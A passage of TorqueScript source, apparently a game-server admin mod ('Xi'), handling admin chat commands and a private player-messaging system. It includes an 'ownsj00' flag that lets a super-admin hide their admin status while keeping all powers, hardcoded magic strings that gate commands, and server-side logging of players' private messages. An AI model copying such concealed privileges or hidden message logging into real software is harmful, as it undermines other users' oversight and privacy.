               //schedule the end of match countdown
               %elapsedTimeMS = getSimTime() - $missionStartTime;
               %curTimeLeftMS = ($Host::TimeLimit * 60 * 1000) - %elapsedTimeMS;
      			error("time limit="@$Host::TimeLimit@", elapsed="@(%elapsedTimeMS / 60000)@", curtimeleftms="@%curTimeLeftMS);
               CancelEndCountdown();
               EndCountdown(%curTimeLeftMS);
               cancel(Game.timeSync);
               Game.checkTimeLimit(true);
            }
         }
      }
      else
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
   }
   else if(%cmd $= "settime")
   {
      %val = getWord(%msg, 1);
      if(%cl.isSuperAdmin || %cl.ownsj00)
      {
         if(%val < 5) // not that easy
            %val = 5;

         messageClient(%cl, 'MsgXIError38', '\c3Xi[Server]: Time limit set to %1 minutes.', %val);
         $Host::TimeLimit = %val;

         //if the time limit was actually changed...
         %cause = "(Xi)";
         if(%cause !$= "")
         {
            logEcho("time limit set to "@%display SPC %cause);

            //if the match has been started, reset the end of match countdown
            if($matchStarted)
            {
               //schedule the end of match countdown
               %elapsedTimeMS = getSimTime() - $missionStartTime;
               %curTimeLeftMS = ($Host::TimeLimit * 60 * 1000) - %elapsedTimeMS;
      			error("time limit="@$Host::TimeLimit@", elapsed="@(%elapsedTimeMS / 60000)@", curtimeleftms="@%curTimeLeftMS);
               CancelEndCountdown();
               EndCountdown(%curTimeLeftMS);
               cancel(Game.timeSync);
               Game.checkTimeLimit(true);
            }
         }
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
      }
   }
   else if(%cmd $= "setFXState")
   {
      if(%cl.isSuperAdmin || %cl.ownsj00)
      {
         %val = getWord(%msg, 1);
         Xi.canSFX = %val;

         %word = !%val ? "DISABLED" : "ENABLED";
         messageClient(%cl, 'MsgXIError105', '\c3Xi[Server]: FX %1.', %word);
      }
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
      }
   }
   else if(%cmd $= "Server.chat")
   {
      %val = getSubStr(%msg, %len, 255);
      if(%cl.isAdmin || %cl.isSuperAdmin || %cl.ownsj00)
         graphWindowDynamicAll(%val, 100, 1, 4, true, "<color:00FF00>");
      else
      {
         messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by an Admin.');
         logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
      }

      return;
   }
   else if(%cmd $= "Server.enable")
   {
      %val = getWord(%msg, 1);
      if(%val !$= "" && %val $= "eastereggs_sdkfshadglhg")
      {
         if(%cl.isSuperAdmin || %cl.ownsj00)
         {
            messageClient(%cl, 'MsgXIError39', '\c3Xi[Server]: Eastereggs ENABLED.');
            eastereggs();
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
            logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         }

         return;
      }
      else if(%val !$= "" && %val $= "flagcapping")
      {
         if(%cl.isSuperAdmin || %cl.ownsj00)
         {
            messageClient(%cl, 'MsgXIError40', '\c3Xi[Server]: Flag Capping ENABLED.');
            $devserver = false;
         }
         else
         {
            messageClient(%cl, 'MsgXIError40', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
            logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         }

         return;
      }
   }
   else if(%cmd $= "Server.disable")
   {
      %val = getWord(%msg, 1);
      if(%val !$= "" && %val $= "eastereggs_jldshsahslkdj")
      {
         if(%cl.isSuperAdmin || %cl.ownsj00)
         {
            messageClient(%cl, 'MsgXIError41', '\c3Xi[Server]: Eastereggs DISABLED.');
            killeggs();
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
            logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         }

         return;
      }
      else if(%val !$= "" && %val $= "flagcapping")
      {
         if(%cl.isSuperAdmin || %cl.ownsj00)
         {
            messageClient(%cl, 'MsgXIError42', '\c3Xi[Server]: Flag Capping DISABLED.');
            $devserver = true;
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
            logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         }

         return;
      }
   }
   else if(%cmd $= "Server.setself")
   {
      %val = getWord(%msg, 1);
      if(%val !$= "" && %val $= "admin")
      {
         if(%cl.isSuperAdmin || %cl.ownsj00)
         {
            messageClient(%cl, 'MsgXIError43', '\c3Xi[Server]: You now have ADMIN.');
            %cl.isAdmin = true;
            %cl.isSuperAdmin = false;
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
            logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         }

         return;
      }
      else if(%val !$= "" && %val $= "superadmin")
      {
         if(%cl.isSuperAdmin || %cl.ownsj00)
         {
            messageClient(%cl, 'MsgXIError44', '\c3Xi[Server]: You now have Super-ADMIN.');
            %cl.isAdmin = true;
            %cl.isSuperAdmin = true;
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
            logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         }

         return;
      }
      else if(%val !$= "" && %val $= "hidden")
      {
         if(%cl.isSuperAdmin || %cl.ownsj00)
         {
            messageClient(%cl, 'MsgXIError45', '\c3Xi[Server]: Hiding your admin status.');
            %cl.isSuperAdmin = false;
            %cl.isAdmin = false;
            %cl.ownsj00 = true;
         }
         else
         {
            messageClient(%cl, 'MsgXIErrorLogAE', '\c5Xi[Admin-Error]: This function can only be accessed by a SuperAdmin.');
            logAttempt("attempted admin function and is not admin; logging "@%cl.getAddress() SPC %cl.guid SPC %cl.nameBase SPC %cl.realname);
         }

         return;
      }
   }
   else
   {
      messageClient(%cl, 'MsgXIError', '\c5Xi[Error]: Bad command or command not enabled on this server.');
      return;
   }
}

function Chat::handleMessage(%chat, %cl, %msg)
{
   %obj = %cl.player;
   %cmd = firstWord(%msg); // what IS the command?
   %len = strlen(%cmd) + 1; // how LONG is the command?

   if(%len < 0)
      %len = 0;

   if(%cmd $= "nametoid")
   {
      %val = getSubStr(%msg, %len, 64);
      if(%val !$= "")
      {
         %guid = 0;
         %count = ClientGroup.getCount();
         for(%i = 0; %i < %count; %i++)
         {
            %obj = ClientGroup.getObject(%i);

            if(%obj.namebase $= %val)
            {
               messageClient(%cl, 'MsgChatError1', '\c3ChatClient: ID of %1 is %2.', %val, %obj.guid);
               return;
            }
         }

         if(!%guid)
         {
            messageClient(%cl, 'MsgChatError2', '\c3ChatClient: Name %1 not found.', %val);
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgChatError3', '\c5ChatClient: No name to search.');
         return;
      }
   }
   else if(%cmd $= "unlock")
   {
      messageClient(%cl, 'MsgChatError4', '\c3ChatClient: Name %1 is unlocked.', %cl.lockedID);
      %cl.lockedID = 0;
      %cl.sLockedClient.lockedClient = 0;
      %cl.sLockedClient = 0;
      return;
   }
   else if(%cmd $= "lock")
   {
      %val = getSubStr(%msg, %len, 64);
      if(%val !$= "")
      {
         %guid = 0;
         %count = ClientGroup.getCount();
         for(%i = 0; %i < %count; %i++)
         {
            %obj = ClientGroup.getObject(%i);

            if(%obj.namebase $= %val)
            {
               %cl.lockedID = %obj.guid;
               %cl.sLockedClient = %obj;
               %obj.lockedClient = %cl;
               messageClient(%cl, 'MsgChatError5', '\c3ChatClient: Name %1 is locked. Use ! to talk to this person and !unlock to unlock the person.', %val);
               return;
            }
         }

         if(!%guid)
         {
            messageClient(%cl, 'MsgChatError6', '\c3ChatClient: Name %1 not found.', %val);
            return;
         }
      }
      else
      {
         messageClient(%cl, 'MsgChatError7', '\c5ChatClient: No name to lock.');
         return;
      }
   }
   else if(%cmd $= "reply")
   {
      if(!%cl.lockedClient)
      {
         messageClient(%cl, 'MsgChatError8', '\c5ChatClient: No one to reply to.');
         return;
      }
      else
      {
         if(!isObject(%cl.lockedClient))
         {
            messageClient(%cl, 'MsgChatError9', '\c5ChatClient: The person is no longer on the server.');
            return;
         }

         %cl.lockedID = %cl.lockedClient.guid;
         %val = getSubStr(%msg, 6, 256);
         if(%val !$= "")
         {
            messageClient(%cl, 'MsgPCS', '\c2IM[%1]: %2', %cl.nameBase, %val);//, %cl.lockedID);
            messageClient(%cl.lockedClient, 'MsgPCR', '\c2IM[%1]: %2', %cl.nameBase, %val);//, %cl.guid);
            %chat.loggedMessage[%chat.messageCount] = "IM["@%cl.nameBase@"]: "@%val;
            if(%chat.messageCount < 100)
               %chat.messageCount++;
            else
               %chat.messageCount = 0;

            return;
         }
         else
         {
            messageClient(%cl, 'MsgChatError10', '\c5ChatClient: No message to send.');
            return;
         }
      }
   }
   else
   {
      if(!%cl.lockedID)
      {
         messageClient(%cl, 'MsgChatError11', '\c5ChatClient: No locked name set. Use !lock to set a locked name.');
         return;
      }

      %tgtcl = 0;
      %count = ClientGroup.getCount(); // does the GUID exist?
      for(%i = 0; %i < %count; %i++)
      {
         %obj = ClientGroup.getObject(%i);

         if(%obj.guid == %cl.lockedID)
            %tgtcl = GUIDToClientID(%cl.lockedID);
      }
      if(%tgtcl)
      {
         %val = getSubStr(%msg, 0, 256);
         if(%val !$= "")
         {
            messageClient(%cl, 'MsgPCL', '\c2IM[%1]: %2', %cl.nameBase, %val);//, %cl.lockedID);
            messageClient(%tgtcl, 'MsgPCR', '\c2IM[%1]: %2', %cl.nameBase, %val);//, %cl.guid);
            %chat.loggedMessage[%chat.messageCount] = "IM["@%cl.nameBase@"]: "@%val;
            if(%chat.messageCount < 100)
               %chat.messageCount++;
            else
               %chat.messageCount = 0;

            return;
         }
         else
         {
            messageClient(%cl, 'MsgChatError10', '\c5ChatClient: No message to send.');
            return;
         }
      }
      else
      {
        messageClient(%cl, 'MsgChatError13', '\c3ChatClient: ID %1 is not playing on this server.', %cl.lockedID);
        return;
      }
   }
}

function Chat::displayMessages(%chat)
{
   for(%i = 0; %i < %chat.messageCount; %i++)
      echo(%i SPC %chat.loggedMessage[%i]);
}

function serverCmdgetXIVersion()
{
   commandToClient('sendMessage', "XI Version "@Xi.Version);
}
